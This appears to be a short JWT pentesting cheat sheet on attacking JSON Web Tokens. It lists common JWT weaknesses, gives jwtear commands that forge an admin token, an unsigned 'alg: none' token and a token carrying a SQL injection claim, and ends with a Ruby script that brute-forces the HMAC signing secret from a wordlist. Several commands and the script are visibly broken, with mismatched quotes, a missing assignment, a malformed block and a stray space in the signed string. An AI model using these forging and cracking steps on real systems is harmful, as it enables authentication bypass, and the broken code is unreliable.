Attacking JSON Web Tokens - JWT Pentesting

 

sign an unsigned token, the process is as follows. 
unsignedToken = encodeBase64(header) + '.' + encodeBase64(payload) 
signature_encoded = encodeBase64(HMAC-SHA256("secret", unsignedToken)) 
jwt_token = encodeBase64(header) + "." + encodeBase64(payload) + "." + signature_encoded

JWT is not vulnerable to CSRF (except when JWT is put in a cookie) 
Session theft through an XSS attack is possible when JWT is used 
Improper token storage (HTML5 storage/cookie) 
Sometimes the key is weak and can be brute-forced 
Faulty token expiration 
JWT can be used as Bearer token in a custom authorization header

JWT is being used for stateless applications. JWT usage results in no server-side storage and database-based session management. All info is put inside a signed JWT token. 
- Only relying on the secret key 
- Logging out or invalidating specific users is not possible due to the above stateless approach. The same signing key is used for everyone.

#HMAC SHA256 signed token creation using JWTear
jwtear --generate-token --header '{"typ" : "JWT", "alg" : "HS256"}' --payload '{"login" : "admin"}' --key 'cr@zyp@ss' 

#Empty signature token creating example 
jwtear --generate-token --header '{"typ" : "JWT", "alg" : "none"}" --payload '{"login" : "admin"}'

#Testing for injection example, $ is used to escape single quotes
jwtear --generate-token --header '{"typ" : "JWT", "alg" : "none"} --payload $'{"login" : "admin\' or \'a\'=\'a"}'

#Brute Force Secret Used to sign a token

require 'base64' 
require 'openssl'

jwt "jwt_goes_here" 
header, data, signature= jwt.split(".") 

def sign (data, secret) 
Base64.urlsafe_encode64(OpenSSL::HMAC.digest(OpenSSL::Digest.new("sha256"), secret, data)).gsub ("=","") 
end 
File.readlines("possible_secrets.txt").each do line| 
	line.chomp! 
	if sign (header+". "+data, line) == signature 
	puts line 
	exit 	
   end 
end